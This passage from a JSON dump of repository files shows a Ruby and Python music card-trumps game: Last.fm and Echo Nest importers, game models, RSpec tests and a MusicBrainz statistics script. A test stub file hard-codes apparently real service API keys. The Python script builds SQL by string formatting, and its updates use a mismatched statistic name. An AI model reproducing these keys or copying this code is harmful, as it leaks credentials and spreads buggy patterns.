"repo_name": "jcoglan/mu_trumps",
"src_encoding": "UTF-8",
"text": "require './lib/mu_trumps'\nrun MuTrumps::Web::Frontend.new\n"
},
{
"alpha_fraction": 0.5225285887718201,
"alphanum_fraction": 0.5238735675811768,
"avg_line_length": 25.087718963623047,
"blob_id": "7098041692e0e47c3895261d9a17e0cf28fb8ccc",
"content_id": "1b18902c5becf5e0e176fd9df7725a83f7b1e014",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 1487,
"license_type": "no_license",
"max_line_length": 101,
"num_lines": 57,
"path": "/lib/mu_trumps/importer/lastfm.rb",
"repo_name": "jcoglan/mu_trumps",
"src_encoding": "UTF-8",
"text": "module MuTrumps\n module Importer\n \n class Lastfm\n SERVICE_ROOT = 'http://ws.audioscrobbler.com/2.0/'\n \n def initialize(username)\n @username = username\n end\n \n def import_top_artists\n json = get_data('user.gettopartists', :user => @username)\n json['topartists']['artist'].each do |lfmartist|\n artist = Artist.find_or_create_by_name(lfmartist['name'])\n\n #This presumes that the images are in order of size\n #smallest -> largest and we take the largest.\n if( lfmartist['image'] && lfmartist['image'].length ) then\n artist.image_url = lfmartist['image'].last['#text']\n end\n\n artist.save\n log(\"Imported #{artist.name}\")\n end\n end\n \n def logger(&block)\n @logger = block\n end\n \n private\n \n def log(message)\n return unless @logger\n @logger.call(message)\n end\n \n def get_data(method, params = {})\n query_params = params.merge(\n :method => method,\n :format => 'json',\n :api_key => api_key)\n \n query = query_params.map { |k,v| CGI.escape(k.to_s) + '=' +CGI.escape(v.to_s) }.join('&')\n uri = URI.parse(SERVICE_ROOT + '?' + query)\n response = Net::HTTP.get_response(uri)\n \n JSON.parse(response.body)\n end\n \n def api_key\n Settings.lastfm.api_key\n end\n end\n \n end\nend\n"
},
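For contrast with the Ruby importer above, a Python sketch of the same Last.fm call; the endpoint and parameters mirror `Lastfm#get_data`, the API key is a placeholder you must supply, and the largest image is taken last, exactly as the Ruby comment notes.

```python
import json
import urllib.parse
import urllib.request

def top_artists(username, api_key):
    query = urllib.parse.urlencode({'method': 'user.gettopartists',
                                    'user': username,
                                    'format': 'json',
                                    'api_key': api_key})
    url = 'http://ws.audioscrobbler.com/2.0/?' + query
    with urllib.request.urlopen(url) as resp:
        data = json.loads(resp.read().decode('utf-8'))
    # Last.fm lists images smallest -> largest; take the largest, as above
    return [(a['name'], a['image'][-1]['#text'] if a.get('image') else None)
            for a in data['topartists']['artist']]
```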
{
"alpha_fraction": 0.6288135647773743,
"alphanum_fraction": 0.6745762825012207,
"avg_line_length": 61.105262756347656,
"blob_id": "ffc74bf57223b1be127f5d7093c72bcaa1311583",
"content_id": "bab34d91f50256f7f77e904e93baafbc5a61c006",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 1180,
"license_type": "no_license",
"max_line_length": 155,
"num_lines": 19,
"path": "/spec/web_stubs.rb",
"repo_name": "jcoglan/mu_trumps",
"src_encoding": "UTF-8",
"text": "dir = File.expand_path(File.dirname(__FILE__))\n\nrequire 'fakeweb'\nFakeWeb.allow_net_connect = %r[^https?://localhost]\n\nFakeWeb.register_uri(:get, 'http://ws.audioscrobbler.com/2.0/?user=jcoglan&method=user.gettopartists&format=json&api_key=fdb6a3b0db7da333c1eb1a7167160397',\n :body => File.read(dir + '/fixtures/top_artists.json'))\n \nFakeWeb.register_uri(:get, 'http://developer.echonest.com/api/v4/artist/search?api_key=WDYWSAVVILHXV5RHT&format=json&name=Imogen+Heap',\n :body => File.read(dir + '/fixtures/echonest_search.json'))\n\nFakeWeb.register_uri(:get, 'http://developer.echonest.com/api/v4/artist/hotttnesss?api_key=WDYWSAVVILHXV5RHT&id=AR7W7171187B9A8842&format=json',\n :body => File.read(dir + '/fixtures/hotttnesss.json'))\n\nFakeWeb.register_uri(:get, 'http://developer.echonest.com/api/v4/artist/familiarity?api_key=WDYWSAVVILHXV5RHT&id=AR7W7171187B9A8842&format=json',\n :body => File.read(dir + '/fixtures/familiarity.json'))\n\nFakeWeb.register_uri(:get, 'http://api.7digital.com/1.2/artist/search?q=Imogen+Heap&oauth_consumer_key=7de69j69ya&country=GB',\n :body => File.read(dir + '/fixtures/7digital.xml'))\n"
},
{
"alpha_fraction": 0.5534539222717285,
"alphanum_fraction": 0.5550987124443054,
"avg_line_length": 21.943395614624023,
"blob_id": "9119b021d31baf37ad7e7bebb57d5a9e0b4a1a6c",
"content_id": "d822ae6dff6d05cad5be77c992eadfef3160f972",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 1216,
"license_type": "no_license",
"max_line_length": 70,
"num_lines": 53,
"path": "/spec/mu_trumps/model/statistic_spec.rb",
"repo_name": "jcoglan/mu_trumps",
"src_encoding": "UTF-8",
"text": "require 'spec_helper'\n\ndescribe MuTrumps::Statistic do\n let(:artist) { Factory(:artist) }\n \n let(:statistic) do\n MuTrumps::Statistic.create(:artist => artist,\n :name => \"releases\",\n :value => 6)\n end\n \n it \"is valid\" do\n statistic.should be_valid\n end\n \n describe \"without an artist\" do\n before { statistic.artist = nil }\n \n it \"is not valid\" do\n statistic.should_not be_valid\n end\n end\n \n describe \"without a name\" do\n before { statistic.name = nil }\n \n it \"is not valid\" do\n statistic.should_not be_valid\n end\n end\n \n describe \"without a value\" do\n before { statistic.value = nil }\n \n it \"is not valid\" do\n statistic.should_not be_valid\n end\n end\n \n describe \"with the same name as another stat for the same artist\" do\n let(:bad_stat) do\n MuTrumps::Statistic.new(:artist => artist,\n :name => \"releases\",\n :value => 6)\n end\n \n it \"is not valid\" do\n bad_stat.artist.should == statistic.artist\n bad_stat.name.should == statistic.name\n bad_stat.should_not be_valid\n end\n end\nend\n"
},
{
"alpha_fraction": 0.6055194735527039,
"alphanum_fraction": 0.6071428656578064,
"avg_line_length": 18.25,
"blob_id": "fbdecbb396974b2602affa2cd0583d7b3af2ff10",
"content_id": "8fa9236eaf9b127ea3bd73b2115a105697742d44",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 616,
"license_type": "no_license",
"max_line_length": 57,
"num_lines": 32,
"path": "/lib/mu_trumps/model/artist.rb",
"repo_name": "jcoglan/mu_trumps",
"src_encoding": "UTF-8",
"text": "module MuTrumps\n class Artist < ActiveRecord::Base\n has_many :identifiers\n has_many :statistics\n validates_presence_of :name\n \n def self.random(n)\n all[0...n]\n end\n \n def assign(stat, value)\n statistic = statistics.find_or_create_by_name(stat)\n statistic.update_attribute(:value, value)\n end\n \n def ids\n reduce_to_hash(identifiers)\n end\n\n def stats\n reduce_to_hash(statistics)\n end\n\n def reduce_to_hash(enum)\n stats = {}\n enum.each do |statistic|\n stats[statistic.name] = statistic.value\n end\n stats\n end\n end\nend\n"
},
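A quick usage sketch of the statistics helpers in the `Artist` model above (hypothetical values; assumes the schema from `config/schema.rb` is loaded, and note that `value` is a float column):

```ruby
artist = MuTrumps::Artist.find_or_create_by_name('Imogen Heap')
artist.assign('releases', 23)   # creates the Statistic row on first call
artist.assign('releases', 24)   # updates it in place (name is unique per artist)
artist.stats                    # => {"releases" => 24.0}
artist.ids                      # identifiers reduced to a hash the same way
```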
{
"alpha_fraction": 0.7098445892333984,
"alphanum_fraction": 0.7098445892333984,
"avg_line_length": 26.571428298950195,
"blob_id": "792318886ccb75b37e90f6f2ad8f881e40f3fc7f",
"content_id": "7b8b0ce2b854b5f3efd7d09485cbbeb1a16ee758",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 193,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 7,
"path": "/lib/mu_trumps/model/statistic.rb",
"repo_name": "jcoglan/mu_trumps",
"src_encoding": "UTF-8",
"text": "module MuTrumps\n class Statistic < ActiveRecord::Base\n belongs_to :artist\n validates_presence_of :artist, :name, :value\n validates_uniqueness_of :name, :scope => :artist_id\n end\nend\n"
},
{
"alpha_fraction": 0.5955315828323364,
"alphanum_fraction": 0.5963020324707031,
"avg_line_length": 30.658536911010742,
"blob_id": "5537b9b123bb52b234d04aa7d21f93eb0a04fe29",
"content_id": "c4b65487ee470392e504732a670a0a812d4cd93c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 1298,
"license_type": "no_license",
"max_line_length": 118,
"num_lines": 41,
"path": "/lib/mu_trumps/importer/echonest.rb",
"repo_name": "jcoglan/mu_trumps",
"src_encoding": "UTF-8",
"text": "module MuTrumps\n module Importer\n \n class Echonest\n SERVICE_ROOT = 'http://developer.echonest.com/api/v4/'\n \n def initialize(artist)\n @artist = artist\n end\n \n def import_hotttnesss\n uri = URI.parse(\"#{SERVICE_ROOT}artist/hotttnesss?api_key=#{api_key}&id=#{artist_id}&format=json\")\n response = Net::HTTP.get_response(uri)\n value = JSON.parse(response.body)['response']['artist']['hotttnesss']\n @artist.assign('hotttnesss', value)\n rescue\n end\n \n def import_familiarity\n uri = URI.parse(\"#{SERVICE_ROOT}artist/familiarity?api_key=#{api_key}&id=#{artist_id}&format=json\")\n response = Net::HTTP.get_response(uri)\n value = JSON.parse(response.body)['response']['artist']['familiarity']\n @artist.assign('familiarity', value)\n rescue\n end\n \n def artist_id\n return @artist_id if defined?(@artist_id)\n \n uri = URI.parse(\"#{SERVICE_ROOT}artist/search?api_key=#{api_key}&format=json&name=#{CGI.escape @artist.name}\")\n response = Net::HTTP.get_response(uri)\n @artist_id = JSON.parse(response.body)['response']['artists'].first['id']\n end\n \n def api_key\n Settings.echonest.api_key\n end\n end\n \n end\nend\n"
},
{
"alpha_fraction": 0.5914096832275391,
"alphanum_fraction": 0.6007709503173828,
"avg_line_length": 28.29032325744629,
"blob_id": "912b7ce530a2eaaeaecca40f9313a221a0bc10a2",
"content_id": "c0ea75d1eefb3f32604323d1a967399207334c71",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 1816,
"license_type": "no_license",
"max_line_length": 111,
"num_lines": 62,
"path": "/spec/mu_trumps/web/messaging_spec.rb",
"repo_name": "jcoglan/mu_trumps",
"src_encoding": "UTF-8",
"text": "require 'spec_helper'\n\ndescribe MuTrumps::Web::Messaging do\n let(:app) do\n app = MuTrumps::Web::Messaging.new(:timeout => 2, :mount => \"/\")\n app.extend(ThinRunner)\n app\n end\n \n before(:all) { app.start(8000) }\n after(:all) { app.stop }\n \n def connect\n endpoint = URI.parse(\"http://localhost:8000/\")\n channel = \"/games/#{game.id}/alice\"\n \n handshake = '{\"channel\":\"/meta/handshake\",\"version\":\"1.0\",\"supportedConnectionTypes\":[\"long-polling\"]}'\n response = Net::HTTP.post_form(endpoint, \"message\" => handshake)\n client_id = JSON.parse(response.body)[0][\"clientId\"]\n \n subscribe = '{\"channel\":\"/meta/subscribe\",\"clientId\":\"' + client_id + '\",\"subscription\":\"' + channel + '\"}'\n response = Net::HTTP.post_form(endpoint, \"message\" => subscribe)\n \n connect = '{\"channel\":\"/meta/connect\",\"clientId\":\"' + client_id + '\",\"connectionType\":\"long-polling\"}'\n response = Net::HTTP.post_form(endpoint, \"message\" => connect)\n \n JSON.parse(response.body).map { |m| m['data'] }.compact\n end\n \n let(:alice) { Factory :user, :lastfm_username => \"alice\" }\n let(:bob) { Factory :user, :lastfm_username => \"bob\" }\n let(:game) { Factory :game }\n \n before do\n game.join(alice)\n game.join(bob)\n end\n \n describe \"when no messages are sent\" do\n it \"receives no events\" do\n connect.should == []\n end\n \n it \"returns after the timeout\" do\n lambda { connect }.should take(2)\n end\n end\n \n describe \"when a message is sent\" do\n before do\n EM.add_timer(1) { MuTrumps::Web::Messaging.publish(game, alice, \"hello\") }\n end\n \n it \"receives an event\" do\n connect.should == [{\"event\" => \"hello\"}]\n end\n \n it \"returns when the message is sent\" do\n lambda { connect }.should take(1..1.2)\n end\n end\nend\n"
},
{
"alpha_fraction": 0.6536585092544556,
"alphanum_fraction": 0.6536585092544556,
"avg_line_length": 17.636363983154297,
"blob_id": "e5cbe96a09337abd14c2b6003805fb2c183f5718",
"content_id": "120c0b91579149f27f5db71154d17d3e9a9224d3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 205,
"license_type": "no_license",
"max_line_length": 40,
"num_lines": 11,
"path": "/lib/mu_trumps/model/card.rb",
"repo_name": "jcoglan/mu_trumps",
"src_encoding": "UTF-8",
"text": "module MuTrumps\n class Card < ActiveRecord::Base\n belongs_to :artist\n belongs_to :game\n belongs_to :user\n \n validates_presence_of :artist, :game\n\n acts_as_list :scope => :game\n end\nend\n"
},
{
"alpha_fraction": 0.5974223017692566,
"alphanum_fraction": 0.6000758409500122,
"avg_line_length": 24.86274528503418,
"blob_id": "43a4f4828cb5b913f7eb7bbd37a8eebe16625117",
"content_id": "593015a3dc0eb6172e1a29f8402705d21623925e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 2638,
"license_type": "no_license",
"max_line_length": 98,
"num_lines": 102,
"path": "/lib/mu_trumps/model/game.rb",
"repo_name": "jcoglan/mu_trumps",
"src_encoding": "UTF-8",
"text": "module MuTrumps\n class Game < ActiveRecord::Base\n has_many :cards, :order => :position\n has_and_belongs_to_many :users, :uniq => true\n belongs_to :current_user, :class_name => 'MuTrumps::User'\n \n before_create :generate_deck\n \n DECK_SIZE = 52\n WAITING = 'waiting'\n READY = 'ready'\n \n class PlayOutOfTurn < StandardError ; end\n class NotInDeck < StandardError ; end\n class UnknownPlayer < StandardError ; end\n\n def self.join(user)\n game = last\n game = create unless game and game.users.size < 2\n game.join(user)\n game\n end\n \n def join(user)\n cards.each_with_index do |card, index|\n next unless (users.empty? and index.even?) or (not users.empty? and index.odd?)\n card.update_attribute(:user, user)\n end\n users << user\n self.current_user ||= user\n save\n end\n \n def leave(user)\n raise UnknownPlayer unless users.include?(user)\n users.delete(user)\n end\n \n def cards_for(user)\n cards.select { |card| card.user == user }\n end\n \n def current_artist_for(user)\n cards_for(user).first.artist\n end\n \n def waiting_user\n users.select { |user| user != current_user }.first\n end\n\n def play(user, artist, stat_name)\n raise PlayOutOfTurn unless user == current_user\n raise NotInDeck unless current_artist_for(user) == artist\n update_attribute(:current_stat, stat_name)\n end\n \n def ack(user)\n raise PlayOutOfTurn unless user != current_user\n attack, defense = [current_user, user].map { |u| current_artist_for(u).stats[current_stat] }\n if defense.nil?\n round_won_by(current_user)\n elsif attack > defense\n round_won_by(current_user)\n elsif defense > attack\n round_won_by(user)\n end\n update_attribute(:current_stat, nil)\n end\n\n def round_won_by(winner)\n loser = users.reject { |u| u == winner }.first\n top_cards = [loser, winner].map { |u| cards_for(u).first }\n top_cards.each do |card|\n card.reload\n card.update_attribute(:user, winner)\n card.move_to_bottom\n end\n update_attribute(:current_user, winner)\n reload\n end\n \n def winner\n remaining = users.select { |u| cards_for(u).size > 0 }\n remaining.size == 1 ? remaining.first : nil\n end\n\n def status\n case users.count\n when 1 then WAITING\n when 2 then READY\n end\n end\n \n private\n \n def generate_deck\n self.cards = Artist.random(DECK_SIZE).map do |artist|\n Card.new(:artist => artist)\n end\n end\n end\nend\n"
},
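For orientation, here is a hedged walk-through of one round using the `Game` API above (a sketch only; it assumes artists and their stats have already been imported and that the named stat exists):

```ruby
alice = MuTrumps::User['alice']
bob   = MuTrumps::User['bob']

game = MuTrumps::Game.join(alice)  # creates a waiting game, deals even-indexed cards
MuTrumps::Game.join(bob)           # fills the same game; status becomes 'ready'

artist = game.current_artist_for(alice)
game.play(alice, artist, 'hotttnesss')  # the current user leads with a stat
game.ack(bob)                           # the defender acknowledges; top cards move

puts game.winner ? game.winner.lastfm_username : 'game continues'
```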
{
"alpha_fraction": 0.5647969245910645,
"alphanum_fraction": 0.5647969245910645,
"avg_line_length": 20.54166603088379,
"blob_id": "8ba962a5d942a9d97c47199f6d11396c887cc1f2",
"content_id": "ffa4397a9aaabf9b4ea8919cdd8038ffcc0e0c5c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 517,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 24,
"path": "/lib/mu_trumps/web/messaging.rb",
"repo_name": "jcoglan/mu_trumps",
"src_encoding": "UTF-8",
"text": "require 'faye'\n\nmodule MuTrumps\n module Web\n \n class Messaging < Faye::RackAdapter\n def self.new(*args)\n @instance = super(*args)\n end\n \n def self.publish(*args)\n return unless @instance\n @instance.publish(*args)\n end\n \n def publish(game, user, event, params = {})\n channel = \"/games/#{game.id}/#{user.lastfm_username}\"\n message = params.merge('event' => event)\n get_client.publish(channel, message)\n end\n end\n \n end\nend\n"
},
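A sketch of pushing an in-game event through the adapter above. This only works once a `Messaging` instance has been constructed (as `Frontend` does), since the class-level `publish` delegates to `@instance`; the stat and value shown are placeholders:

```ruby
game = MuTrumps::Game.first
user = game.users.first

MuTrumps::Web::Messaging.publish(game, user, 'play',
                                 'stat' => 'hotttnesss', 'value' => 0.51)
# Subscribers on "/games/#{game.id}/#{user.lastfm_username}" receive
# {"event" => "play", "stat" => "hotttnesss", "value" => 0.51}
```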
{
"alpha_fraction": 0.6325503587722778,
"alphanum_fraction": 0.6895973086357117,
"avg_line_length": 26.090909957885742,
"blob_id": "c70a34678eb30555107f2235836ff4bc22cf1206",
"content_id": "ed4081d6355edf026ff0b742e2b01027b321b785",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 596,
"license_type": "no_license",
"max_line_length": 64,
"num_lines": 22,
"path": "/spec/mu_trumps/importer/echonest_spec.rb",
"repo_name": "jcoglan/mu_trumps",
"src_encoding": "UTF-8",
"text": "require 'spec_helper'\n\ndescribe MuTrumps::Importer::Echonest do\n before do\n @imogen = Factory(:artist, :name => \"Imogen Heap\")\n @importer = MuTrumps::Importer::Echonest.new(@imogen)\n end\n \n describe \"import_hotttnesss\" do\n it \"imports the hotttnesss for all artists\" do\n @importer.import_hotttnesss\n @imogen.stats[\"hotttnesss\"].should == 0.518605607525262\n end\n end\n \n describe \"import_familiarity\" do\n it \"imports the familiarity for all artists\" do\n @importer.import_familiarity\n @imogen.stats[\"familiarity\"].should == 0.81634935777606032\n end\n end\nend\n"
},
{
"alpha_fraction": 0.5885885953903198,
"alphanum_fraction": 0.5885885953903198,
"avg_line_length": 19.8125,
"blob_id": "6815e15c81d41334b92cb2482bacb48e2e9fb4ee",
"content_id": "4fd15ceb849019be6b757588a99b18c6b4da64c6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 333,
"license_type": "no_license",
"max_line_length": 68,
"num_lines": 16,
"path": "/spec/matchers.rb",
"repo_name": "jcoglan/mu_trumps",
"src_encoding": "UTF-8",
"text": "RSpec::Matchers.define :take do |duration|\n match do |proc|\n begin\n start = Time.now\n proc.call\n diff = Time.now - start\n \n case duration\n when Numeric then diff >= duration\n when Range then diff >= duration.begin and diff < duration.end\n end\n rescue => e\n false\n end\n end\nend\n"
},
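For reference, the messaging specs exercise this matcher both with a bare number and with a range:

```ruby
lambda { connect }.should take(2)       # blocks for at least 2 seconds
lambda { connect }.should take(1..1.2)  # returns within the given window
```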
{
"alpha_fraction": 0.6677316427230835,
"alphanum_fraction": 0.690095841884613,
"avg_line_length": 23.076923370361328,
"blob_id": "7576d528ba50c003dde2cd8aa883b822452c357e",
"content_id": "45b20d28f08f29d6343b05fcd9597195469bdeba",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 313,
"license_type": "no_license",
"max_line_length": 62,
"num_lines": 13,
"path": "/spec/factories.rb",
"repo_name": "jcoglan/mu_trumps",
"src_encoding": "UTF-8",
"text": "require 'factory_girl'\n\nFactory.define :artist, :class => MuTrumps::Artist do |a|\n a.name 'Imogen Heap'\n a.image_url 'http://userserve-ak.last.fm/serve/34/59404.jpg'\nend\n\nFactory.define :game, :class => MuTrumps::Game do |g|\nend\n\nFactory.define :user, :class => MuTrumps::User do |u|\n u.lastfm_username 'alice'\nend\n"
},
{
"alpha_fraction": 0.5736137628555298,
"alphanum_fraction": 0.5736137628555298,
"avg_line_length": 17.678571701049805,
"blob_id": "5423c00749cdd61b028035577cc55663e1ed3611",
"content_id": "c0f9985d4c73acbc16e4906694324aca73453e97",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 523,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 28,
"path": "/spec/mu_trumps/model/card_spec.rb",
"repo_name": "jcoglan/mu_trumps",
"src_encoding": "UTF-8",
"text": "require 'spec_helper'\n\ndescribe MuTrumps::Card do\n let(:card) do\n MuTrumps::Card.create(:game => Factory(:game),\n :artist => Factory(:artist))\n end\n \n it \"is valid\" do\n card.should be_valid\n end\n \n describe \"without a game\" do\n before { card.game = nil }\n \n it \"is not valid\" do\n card.should_not be_valid\n end\n end\n \n describe \"without an artist\" do\n before { card.artist = nil }\n \n it \"is not valid\" do\n card.should_not be_valid\n end\n end\nend\n"
},
{
"alpha_fraction": 0.6820987462997437,
"alphanum_fraction": 0.6851851940155029,
"avg_line_length": 19.90322494506836,
"blob_id": "537afeea8f06032d35e7cdb6113998c8fdbf1daf",
"content_id": "b5b40c8f536b707194daa6a31158420f998f064b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 648,
"license_type": "no_license",
"max_line_length": 52,
"num_lines": 31,
"path": "/spec/spec_helper.rb",
"repo_name": "jcoglan/mu_trumps",
"src_encoding": "UTF-8",
"text": "dir = File.expand_path(File.dirname(__FILE__))\nrequire dir + '/../lib/mu_trumps'\n\nrequire 'fileutils'\nFileUtils.mkdir_p(dir + '/db')\nActiveRecord::Base.establish_connection(\n :adapter => 'sqlite3',\n :database => dir + '/db/test.sqlite3')\n\nrequire dir + '/../config/schema'\nrequire dir + '/factories'\n\nrequire 'rack/test'\nrequire dir + '/thin_runner'\nrequire 'uri'\nrequire 'net/http'\n\nrequire dir + '/matchers'\n\nrequire 'thin'\nThin::Logging.silent = true\n\nrequire dir + '/web_stubs'\n\nRSpec.configure do |config|\n config.after do\n ObjectSpace.each_object(Class) do |klass|\n klass.delete_all if klass < ActiveRecord::Base\n end\n end\nend\n"
},
{
"alpha_fraction": 0.6273072957992554,
"alphanum_fraction": 0.6381650567054749,
"avg_line_length": 29.966386795043945,
"blob_id": "e1aec6ef262712425645c715fcaee8e29f8a5403",
"content_id": "b51c90de7917770fe682ad168a08dfc4813002d2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3684,
"license_type": "no_license",
"max_line_length": 107,
"num_lines": 119,
"path": "/scripts/populate_release_data.py",
"repo_name": "jcoglan/mu_trumps",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n# encoding: utf-8\n\"\"\"\npopulate_release_data.py\n\nCreated by Benjamin Fields on 2011-01-24.\nCopyright (c) 2011 Goldsmith University of London. All rights reserved.\n\"\"\"\n\nimport sys\nimport os\nimport logging\n\nfrom musicbrainz2.webservice import Query, ArtistFilter, WebServiceError\nimport musicbrainz2.webservice as ws\nimport musicbrainz2.model as m\nfrom time import sleep, strftime\n\nimport sqlite3\n\nSLEEP_TIME = 1.4\nVERBOSE = True\n\ndef main(argv=None):\n\tif argv==None:\n\t\targv=sys.argv\n\t\n\tq = Query()\n\t\n\tconn = sqlite3.connect('db/mu_trumps.sqlite3')\n\tc = conn.cursor()\n\tinsert_cursor = conn.cursor()\n\tc.execute('select * from artists')\n\t\n\tfor artist_id, created, modified, artist_name, artist_url in c:\n\t\ttry:\n\t\t\t# Search for all artists matching the given name. Limit the results\n\t\t\t# to the best match. \n\t\t\tf = ArtistFilter(name=artist_name, limit=5)\n\t\t\tartistResults = q.getArtists(f)\n\t\texcept WebServiceError, e:\n\t\t\tprint 'Error:', e\n\t\t\tif \"HTTP Error 503\" in str(e):\n\t\t\t\tprint \"taking a rest...\"\n\t\t\t\tsleep(SLEEP_TIME*10)\n\t\t\tcontinue\n\t\ttry:\n\t\t\tmbz_id = artistResults[0].artist.id\n\t\texcept IndexError:\n\t\t\tprint \"Could not find a musicbrainz id for the artist\", artist_name, \"moving on...\"\n\t\t\tcontinue\n\t\tif VERBOSE:\n\t\t\tprint \"For artist\", artist_name, \"found id\", artist_id\n\t\ttry:\n\t\t\t# The result should include all official albums.\n\t\t\t#\n\t\t\tinc = ws.ArtistIncludes(\n\t\t\t\treleases=(m.Release.TYPE_OFFICIAL, m.Release.TYPE_ALBUM),\n\t\t\t\ttags=True, releaseGroups=True)\n\t\t\tartist = q.getArtistById(mbz_id, inc)\n\t\texcept ws.WebServiceError, e:\n\t\t\tprint 'Error:', e\n\t\t\tif \"HTTP Error 503\" in str(e):\n\t\t\t\tprint \"taking a rest...\"\n\t\t\t\tsleep(SLEEP_TIME*10)\n\t\t\tcontinue\n\t\talbum_count = len(artist.getReleases())\n\t\tif VERBOSE:\n\t\t\tprint \"\\thas released\", album_count,\"albums.\"\n\t\ttry:\n\t\t\t# The result should include all official albums.\n\t\t\t#\n\t\t\tinc = ws.ArtistIncludes(\n\t\t\t\treleases=(m.Release.TYPE_OFFICIAL, m.Release.TYPE_SINGLE),\n\t\t\t\ttags=True, releaseGroups=True)\n\t\t\tartist = q.getArtistById(mbz_id, inc)\n\t\texcept ws.WebServiceError, e:\n\t\t\tprint 'Error:', e\n\t\t\tif \"HTTP Error 503\" in str(e):\n\t\t\t\tprint \"taking a rest...\"\n\t\t\t\tsleep(SLEEP_TIME*10)\n\t\t\tcontinue\n\t\tsingle_count = len(artist.getReleases())\n\t\tif VERBOSE:\n\t\t\tprint \"\\thas released\", single_count,\"singles.\"\n\t\tinsert_cursor.execute(\"\"\"select * from statistics where artist_id = %i and name = 'albums'\"\"\"%artist_id)\n\t\tif len(list(insert_cursor)) == 0:\n\t\t\tinsert_cursor.execute(\\\n\t\t\t\t\"\"\"insert into statistics (\"created_at\",\"updated_at\", \"artist_id\", \"name\", \"value\") \\\n\t\t\t\tvalues ('%s','%s',%i,'%s',%i)\"\"\"%(strftime(\"%Y-%m-%d %H:%M:%S\"),\n\t\t\t\t\t\t\t\t\t\tstrftime(\"%Y-%m-%d %H:%M:%S\"),\n\t\t\t\t\t\t\t\t\t\tartist_id, \n\t\t\t\t\t\t\t\t\t\t'albums', \n\t\t\t\t\t\t\t\t\t\talbum_count))\n\t\telse:\n\t\t\tinsert_cursor.execute(\\\n\t\t\t\"\"\"update statistics set \"updated_at\" = '%s', \"value\" = %i\\\n\t\t\t where artist_id = %i and name = 'album'\"\"\"%(strftime(\"%Y-%m-%d %H:%M:%S\"), album_count, artist_id))\n\t\tinsert_cursor.execute(\"\"\"select * from statistics where artist_id = %i and name = 'singles'\"\"\"%artist_id)\n\t\tif len(list(insert_cursor)) == 0:\n\t\t\tinsert_cursor.execute(\\\n\t\t\t\t\"\"\"insert into statistics 
(\"created_at\",\"updated_at\", \"artist_id\", \"name\", \"value\") \\\n\t\t\t\tvalues ('%s','%s',%i,'%s',%i)\"\"\"%(strftime(\"%Y-%m-%d %H:%M:%S\"),\n\t\t\t\t\t\t\t\t\t\tstrftime(\"%Y-%m-%d %H:%M:%S\"),\n\t\t\t\t\t\t\t\t\t\tartist_id, \n\t\t\t\t\t\t\t\t\t\t'singles', \n\t\t\t\t\t\t\t\t\t\tsingle_count))\n\t\telse:\n\t\t\tinsert_cursor.execute(\\\n\t\t\t\"\"\"update statistics set \"updated_at\" = '%s', \"value\" = '%i'\\\n\t\t\t where artist_id = %i and name = 'album'\"\"\"%(strftime(\"%Y-%m-%d %H:%M:%S\"), single_count, artist_id))\n\t\tconn.commit()\n\t\tif VERBOSE:\n\t\t\tprint \"values updated/inserted.\"\n\t\tsleep(SLEEP_TIME)\n\tconn.close()\n\nif __name__ == '__main__':\n\tmain()"
},
{
"alpha_fraction": 0.680701732635498,
"alphanum_fraction": 0.6877192854881287,
"avg_line_length": 24.909090042114258,
"blob_id": "7820cd1e81cff826755e8b0866697a0567ac5832",
"content_id": "eced45e479a4b30710f914ccc91bbffd44453b6a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 285,
"license_type": "no_license",
"max_line_length": 48,
"num_lines": 11,
"path": "/config/environment.rb",
"repo_name": "jcoglan/mu_trumps",
"src_encoding": "UTF-8",
"text": "dir = File.expand_path(File.dirname(__FILE__))\n\nrequire 'rubygems'\nrequire 'active_record'\nrequire 'acts_as_list'\nrequire 'fileutils'\nFileUtils.mkdir_p(dir + '/../db')\n\nActiveRecord::Base.establish_connection(\n :adapter => 'sqlite3',\n :database => dir + '/../db/mu_trumps.sqlite3')\n"
},
{
"alpha_fraction": 0.5047022104263306,
"alphanum_fraction": 0.5109717845916748,
"avg_line_length": 20.266666412353516,
"blob_id": "b698de0f16592cee30fbe516f4862e036b1dc0e3",
"content_id": "42398e4f73a5567ff6fe0237b593418e849cf268",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 319,
"license_type": "no_license",
"max_line_length": 52,
"num_lines": 15,
"path": "/lib/mu_trumps/web/frontend.rb",
"repo_name": "jcoglan/mu_trumps",
"src_encoding": "UTF-8",
"text": "module MuTrumps\n module Web\n \n class Frontend < Rack::URLMap\n def initialize(map = {})\n @application = Application.new\n @messaging = Messaging.new(:timeout => 25)\n \n super('/messaging' => @messaging,\n '/' => @application)\n end\n end\n \n end\nend\n"
},
{
"alpha_fraction": 0.6269177198410034,
"alphanum_fraction": 0.6269177198410034,
"avg_line_length": 23.305084228515625,
"blob_id": "77d4353cc721e75a0b3a993730e54a59babe95b7",
